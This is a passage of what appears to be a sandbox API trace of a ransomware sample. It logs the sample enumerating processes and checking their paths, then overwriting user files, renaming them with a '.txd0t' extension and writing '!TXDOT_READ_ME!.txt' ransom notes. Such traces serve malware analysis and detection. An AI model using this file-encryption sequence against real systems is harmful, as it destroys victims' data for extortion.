out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0090.820] GetCurrentProcessId () returned 0xf00 [0090.820] GetCurrentProcess () returned 0xffffffff [0090.820] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0090.820] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xb60) returned 0x45c [0090.821] GetModuleFileNameExW (in: hProcess=0x45c, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Windows\\SystemApps\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\SearchUI.exe" (normalized: "c:\\windows\\systemapps\\microsoft.windows.cortana_cw5n1h2txyewy\\searchui.exe")) returned 0x4a [0090.821] StrStrIW (lpFirst="C:\\Windows\\SystemApps\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\SearchUI.exe", lpSrch="C:\\WINDOWS") returned="C:\\Windows\\SystemApps\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\SearchUI.exe" [0090.821] CloseHandle (hObject=0x45c) returned 1 [0090.821] Process32NextW (in: hSnapshot=0x464, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0090.821] GetCurrentProcessId () returned 0xf00 [0090.821] GetCurrentProcess () returned 0xffffffff [0090.821] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0090.821] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xbe4) returned 0x45c [0090.821] GetModuleFileNameExW (in: hProcess=0x45c, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\RuntimeBroker.exe" (normalized: "c:\\windows\\system32\\runtimebroker.exe")) returned 0x25 [0090.821] StrStrIW (lpFirst="C:\\Windows\\System32\\RuntimeBroker.exe", lpSrch="C:\\WINDOWS") returned="C:\\Windows\\System32\\RuntimeBroker.exe" [0090.822] CloseHandle (hObject=0x45c) returned 1 [0090.822] Process32NextW (in: hSnapshot=0x464, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0090.822] GetCurrentProcessId () returned 0xf00 [0090.822] GetCurrentProcess () returned 0xffffffff [0090.822] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0090.822] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xe0c) returned 0x0 [0090.822] Process32NextW (in: hSnapshot=0x464, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0090.823] GetCurrentProcessId () returned 0xf00 [0090.823] GetCurrentProcess () returned 0xffffffff [0090.823] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0090.823] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x1168) returned 0x0 [0090.823] Process32NextW (in: hSnapshot=0x464, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0090.823] GetCurrentProcessId () returned 0xf00 [0090.823] GetCurrentProcess () returned 0xffffffff [0090.823] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0090.823] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x1240) returned 0x0 [0090.823] Process32NextW (in: hSnapshot=0x464, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0090.824] GetCurrentProcessId () returned 0xf00 [0090.824] GetCurrentProcess () returned 0xffffffff [0090.824] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0090.824] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x12d4) returned 0x45c [0090.824] GetModuleFileNameExW (in: hProcess=0x45c, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\taskhostw.exe" (normalized: "c:\\windows\\system32\\taskhostw.exe")) returned 0x21 [0090.824] StrStrIW (lpFirst="C:\\Windows\\System32\\taskhostw.exe", lpSrch="C:\\WINDOWS") returned="C:\\Windows\\System32\\taskhostw.exe" [0090.824] CloseHandle (hObject=0x45c) returned 1 [0090.824] Process32NextW (in: hSnapshot=0x464, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0090.825] GetCurrentProcessId () returned 0xf00 [0090.825] GetCurrentProcess () returned 0xffffffff [0090.825] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0090.825] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x12dc) returned 0x0 [0090.825] Process32NextW (in: hSnapshot=0x464, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0090.825] GetCurrentProcessId () returned 0xf00 [0090.825] GetCurrentProcess () returned 0xffffffff [0090.825] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0090.825] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x12e4) returned 0x0 [0090.825] Process32NextW (in: hSnapshot=0x464, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x130c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0090.826] GetCurrentProcessId () returned 0xf00 [0090.826] GetCurrentProcess () returned 0xffffffff [0090.826] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0090.826] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x130c) returned 0x0 [0090.826] Process32NextW (in: hSnapshot=0x464, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="AppHostRegistrationVerifier.exe")) returned 1 [0090.826] GetCurrentProcessId () returned 0xf00 [0090.826] GetCurrentProcess () returned 0xffffffff [0090.826] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0090.826] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x1314) returned 0x45c [0090.826] GetModuleFileNameExW (in: hProcess=0x45c, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\AppHostRegistrationVerifier.exe" (normalized: "c:\\windows\\system32\\apphostregistrationverifier.exe")) returned 0x33 [0090.827] StrStrIW (lpFirst="C:\\Windows\\System32\\AppHostRegistrationVerifier.exe", lpSrch="C:\\WINDOWS") returned="C:\\Windows\\System32\\AppHostRegistrationVerifier.exe" [0090.827] CloseHandle (hObject=0x45c) returned 1 [0090.827] Process32NextW (in: hSnapshot=0x464, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x131c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0090.827] GetCurrentProcessId () returned 0xf00 [0090.827] GetCurrentProcess () returned 0xffffffff [0090.827] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0090.827] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x131c) returned 0x0 [0090.827] Process32NextW (in: hSnapshot=0x464, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x135c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x130c, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0090.828] GetCurrentProcessId () returned 0xf00 [0090.828] GetCurrentProcess () returned 0xffffffff [0090.828] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0090.828] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x135c) returned 0x0 [0090.828] Process32NextW (in: hSnapshot=0x464, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x12e4, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0090.835] GetCurrentProcessId () returned 0xf00 [0090.835] GetCurrentProcess () returned 0xffffffff [0090.835] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0090.835] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x1364) returned 0x0 [0090.835] Process32NextW (in: hSnapshot=0x464, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mspusf.exe")) returned 1 [0090.836] GetCurrentProcessId () returned 0xf00 [0090.836] Process32NextW (in: hSnapshot=0x464, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x704, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0xf00, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0090.836] GetCurrentProcessId () returned 0xf00 [0090.836] GetCurrentProcess () returned 0xffffffff [0090.836] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0090.836] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x704) returned 0x45c [0090.836] GetModuleFileNameExW (in: hProcess=0x45c, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe")) returned 0x1f [0090.836] StrStrIW (lpFirst="C:\\Windows\\System32\\conhost.exe", lpSrch="C:\\WINDOWS") returned="C:\\Windows\\System32\\conhost.exe" [0090.836] CloseHandle (hObject=0x45c) returned 1 [0090.836] Process32NextW (in: hSnapshot=0x464, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xafc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0090.837] GetCurrentProcessId () returned 0xf00 [0090.837] GetCurrentProcess () returned 0xffffffff [0090.837] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0090.837] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xafc) returned 0x0 [0090.837] Process32NextW (in: hSnapshot=0x464, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0090.838] GetCurrentProcessId () returned 0xf00 [0090.838] GetCurrentProcess () returned 0xffffffff [0090.838] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0090.838] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xf78) returned 0x45c [0090.838] GetModuleFileNameExW (in: hProcess=0x45c, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\dllhost.exe" (normalized: "c:\\windows\\system32\\dllhost.exe")) returned 0x1f [0090.838] StrStrIW (lpFirst="C:\\Windows\\System32\\dllhost.exe", lpSrch="C:\\WINDOWS") returned="C:\\Windows\\System32\\dllhost.exe" [0090.838] CloseHandle (hObject=0x45c) returned 1 [0090.838] Process32NextW (in: hSnapshot=0x464, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 0 [0090.838] CloseHandle (hObject=0x464) returned 1 [0090.838] Sleep (dwMilliseconds=0x3a98) Thread: id = 11 os_tid = 0xbdc [0070.084] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x102 [0071.405] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0072.140] StrCpyW (in: psz1=0x37ff480, psz2="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Local\\Resmon.ResmonCfg" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Local\\Resmon.ResmonCfg") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Local\\Resmon.ResmonCfg" [0072.140] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Local\\Resmon.ResmonCfg", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Local\\Resmon.ResmonCfg.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Local\\Resmon.ResmonCfg.txd0t" [0072.140] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Local\\Resmon.ResmonCfg.txd0t") returned 0 [0072.141] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Local\\Resmon.ResmonCfg", dwFileAttributes=0x80) returned 1 [0072.141] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Local\\Resmon.ResmonCfg" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\resmon.resmoncfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x468 [0072.142] GetFileSizeEx (in: hFile=0x468, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=7605) returned 1 [0072.142] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.142] WriteFile (in: hFile=0x468, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0072.157] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0xffffe04b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.157] ReadFile (in: hFile=0x468, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x1db0, lpNumberOfBytesRead=0x37ff440, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff440*=0x1db0, lpOverlapped=0x0) returned 1 [0072.159] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0xffffe250, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.159] WriteFile (in: hFile=0x468, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x1db0, lpNumberOfBytesWritten=0x37ff444, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff444*=0x1db0, lpOverlapped=0x0) returned 1 [0072.159] FlushFileBuffers (hFile=0x468) returned 1 [0072.169] GetProcessHeap () returned 0xe30000 [0072.169] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x10c) returned 0xec8310 [0072.169] StrCpyW (in: psz1=0xec8310, psz2="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Local\\Resmon.ResmonCfg" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Local\\Resmon.ResmonCfg") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Local\\Resmon.ResmonCfg" [0072.169] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Local\\Resmon.ResmonCfg") returned="Resmon.ResmonCfg" [0072.169] StrCpyW (in: psz1=0xec8354, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0072.169] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Local\\!TXDOT_READ_ME!.txt") returned 0 [0072.170] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Local\\!TXDOT_READ_ME!.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\!txdot_read_me!.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x47c [0072.170] WriteFile (in: hFile=0x47c, lpBuffer=0x37ff474*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x37ff470, lpOverlapped=0x0 | out: lpBuffer=0x37ff474*, lpNumberOfBytesWritten=0x37ff470*=0x2, lpOverlapped=0x0) returned 1 [0072.171] FlushFileBuffers (hFile=0x47c) returned 1 [0072.190] WriteFile (in: hFile=0x47c, lpBuffer=0x84d840*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x37ff470, lpOverlapped=0x0 | out: lpBuffer=0x84d840*, lpNumberOfBytesWritten=0x37ff470*=0x7f0, lpOverlapped=0x0) returned 1 [0072.194] FlushFileBuffers (hFile=0x47c) returned 1 [0072.202] CloseHandle (hObject=0x47c) returned 1 [0072.202] GetProcessHeap () returned 0xe30000 [0072.202] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xec8310 | out: hHeap=0xe30000) returned 1 [0072.202] CloseHandle (hObject=0x468) returned 1 [0072.203] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Local\\Resmon.ResmonCfg" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\resmon.resmoncfg"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Local\\Resmon.ResmonCfg.txd0t" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\resmon.resmoncfg.txd0t")) returned 1 [0072.204] SetEvent (hEvent=0x3f8) returned 1 [0072.204] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0072.219] StrCpyW (in: psz1=0x37ff480, psz2="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\c39tCHh.avi" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\c39tCHh.avi") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\c39tCHh.avi" [0072.219] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\c39tCHh.avi", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\c39tCHh.avi.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\c39tCHh.avi.txd0t" [0072.219] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\c39tCHh.avi.txd0t") returned 0 [0072.219] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\c39tCHh.avi", dwFileAttributes=0x80) returned 1 [0072.220] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\c39tCHh.avi" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\c39tchh.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x474 [0072.220] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=64319) returned 1 [0072.220] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.220] WriteFile (in: hFile=0x474, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0072.220] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xffff02c1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.220] ReadFile (in: hFile=0x474, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0xfb30, lpNumberOfBytesRead=0x37ff440, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff440*=0xfb30, lpOverlapped=0x0) returned 1 [0072.223] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xffff04d0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.223] WriteFile (in: hFile=0x474, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0xfb30, lpNumberOfBytesWritten=0x37ff444, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff444*=0xfb30, lpOverlapped=0x0) returned 1 [0072.224] FlushFileBuffers (hFile=0x474) returned 1 [0072.235] GetProcessHeap () returned 0xe30000 [0072.235] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x106) returned 0xe9d750 [0072.235] StrCpyW (in: psz1=0xe9d750, psz2="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\c39tCHh.avi" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\c39tCHh.avi") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\c39tCHh.avi" [0072.235] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\c39tCHh.avi") returned="c39tCHh.avi" [0072.235] StrCpyW (in: psz1=0xe9d798, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0072.235] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\!TXDOT_READ_ME!.txt") returned 1 [0072.236] GetProcessHeap () returned 0xe30000 [0072.236] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d750 | out: hHeap=0xe30000) returned 1 [0072.236] CloseHandle (hObject=0x474) returned 1 [0072.237] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\c39tCHh.avi" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\c39tchh.avi"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\c39tCHh.avi.txd0t" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\c39tchh.avi.txd0t")) returned 1 [0072.238] SetEvent (hEvent=0x3f8) returned 1 [0072.238] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0072.244] StrCpyW (in: psz1=0x37ff480, psz2="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\cv28-Ixq4k3KD.mkv" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\cv28-Ixq4k3KD.mkv") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\cv28-Ixq4k3KD.mkv" [0072.244] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\cv28-Ixq4k3KD.mkv", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\cv28-Ixq4k3KD.mkv.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\cv28-Ixq4k3KD.mkv.txd0t" [0072.244] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\cv28-Ixq4k3KD.mkv.txd0t") returned 0 [0072.244] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\cv28-Ixq4k3KD.mkv", dwFileAttributes=0x80) 